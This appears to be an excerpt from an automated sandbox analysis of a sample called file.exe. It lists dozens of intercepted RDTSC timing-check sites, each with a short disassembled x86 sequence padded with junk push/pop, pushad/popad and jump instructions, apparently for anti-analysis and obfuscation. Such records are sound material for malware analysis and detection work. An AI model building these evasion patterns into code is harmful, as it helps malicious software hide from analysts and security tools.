              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CC76 second address: 53CC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DDCB second address: 53DDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EF02 second address: 53EF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC0Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EF12 second address: 53EF16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53FEB8 second address: 53FEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540F89 second address: 540F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540F8D second address: 540FA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B9CB0EC10h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542F0A second address: 542F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430E7 second address: 5430EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549EB0 second address: 549EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2B9CBCE6B2h 0x0000000a pushad 0x0000000b jmp 00007F2B9CBCE6B9h 0x00000010 jnc 00007F2B9CBCE6A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CB6A second address: 54CB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CB0EC06h 0x0000000a popad 0x0000000b jmp 00007F2B9CB0EC18h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CB8D second address: 54CB92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54FBF2 second address: 54FC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CB0EC11h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55586B second address: 55586F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55586F second address: 55587F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2B9CB0EC06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55587F second address: 555883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556641 second address: 556668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Ah 0x00000007 push eax 0x00000008 ja 00007F2B9CB0EC06h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F2B9CB0EC0Ch 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556668 second address: 556677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F2B9CBCE6A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556950 second address: 55695A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D18D second address: 55D19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B9CBCE6AEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D19F second address: 55D1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52386C second address: 5238BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F2B9CBCE6A8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D1BA9h], ebx 0x00000029 lea eax, dword ptr [ebp+124875FCh] 0x0000002f add dword ptr [ebp+122D2B90h], edi 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 jmp 00007F2B9CBCE6B5h 0x0000003e pop edi 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5238BE second address: 50A11C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F2B9CB0EC06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2B9CB0EC08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call dword ptr [ebp+122D30DEh] 0x0000002f pushad 0x00000030 jmp 00007F2B9CB0EC0Ch 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523CBE second address: 523CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523CD1 second address: 523CEC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2B9CB0EC0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5241DF second address: 5241E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5247E2 second address: 5247E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5248B7 second address: 5248BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AAE second address: 524AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AB2 second address: 524AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524AC0 second address: 524AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524C1E second address: 50AC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F2B9CBCE6B2h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 mov di, dx 0x0000001c call dword ptr [ebp+122D3759h] 0x00000022 pushad 0x00000023 jmp 00007F2B9CBCE6B1h 0x00000028 jp 00007F2B9CBCE6A8h 0x0000002e pushad 0x0000002f popad 0x00000030 ja 00007F2B9CBCE6A8h 0x00000036 popad 0x00000037 pushad 0x00000038 pushad 0x00000039 jnl 00007F2B9CBCE6A6h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 jc 00007F2B9CBCE6A6h 0x00000049 pop eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D47B second address: 55D4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F2B9CB0EC17h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 jno 00007F2B9CB0EC06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D66D second address: 55D672 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D672 second address: 55D68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B9CB0EC06h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F2B9CB0EC30h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F2B9CB0EC06h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D68D second address: 55D691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D691 second address: 55D697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D697 second address: 55D6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D6A1 second address: 55D6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D6A5 second address: 55D6A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56308F second address: 563093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563093 second address: 563099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563099 second address: 5630B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Fh 0x00000007 jl 00007F2B9CB0EC12h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5630B2 second address: 5630B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563519 second address: 563522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563522 second address: 563528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56368C second address: 5636C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F2B9CB0EC08h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F2B9CB0EC19h 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5636C9 second address: 5636DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5639C6 second address: 563A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Fh 0x00000007 jmp 00007F2B9CB0EC12h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F2B9CB0EC06h 0x00000017 jmp 00007F2B9CB0EC11h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5683B6 second address: 5683BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684F9 second address: 56850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2B9CB0EC0Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56850A second address: 56852B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2B9CBCE6B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56852B second address: 568537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568537 second address: 56853D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56853D second address: 568541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568541 second address: 568563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5686E4 second address: 568711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2B9CB0EC1Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568D94 second address: 568DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568F2E second address: 568F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F2B9CB0EC0Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E19E second address: 56E1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57034B second address: 570367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F2B9CB0EC17h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5735E1 second address: 57363B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B6h 0x00000007 jnp 00007F2B9CBCE6BCh 0x0000000d jmp 00007F2B9CBCE6B6h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jl 00007F2B9CBCE6CEh 0x0000001a jne 00007F2B9CBCE6B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007F2B9CBCE6A6h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57363B second address: 57363F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573020 second address: 573026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573175 second address: 57317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57317D second address: 573199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573199 second address: 5731C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F2B9CB0EC17h 0x0000000d je 00007F2B9CB0EC06h 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5731C5 second address: 5731E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jc 00007F2B9CBCE6B4h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579DB1 second address: 579DBE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578B5A second address: 578B66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578CFC second address: 578D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524674 second address: 52467A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5247DA second address: 5247E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578F63 second address: 578F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F2B9CBCE6B3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5790C1 second address: 5790D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jns 00007F2B9CB0EC06h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5790D5 second address: 5790D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579B23 second address: 579B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B431 second address: 57B437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E5C0 second address: 57E5D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E89A second address: 57E8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2B9CBCE6B3h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EB80 second address: 57EBB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2B9CB0EC17h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EBB4 second address: 57EBD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c je 00007F2B9CBCE6C7h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EBD3 second address: 57EBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58455C second address: 584560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584560 second address: 584564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584564 second address: 58456A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58456A second address: 584570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583D07 second address: 583D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F2B9CBCE6A6h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583E59 second address: 583E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842AB second address: 5842B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842B1 second address: 5842B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5842B8 second address: 5842CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2B9CBCE6A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA62 second address: 58BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F2B9CB0EC06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA70 second address: 58BA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F2B9CBCE6A6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
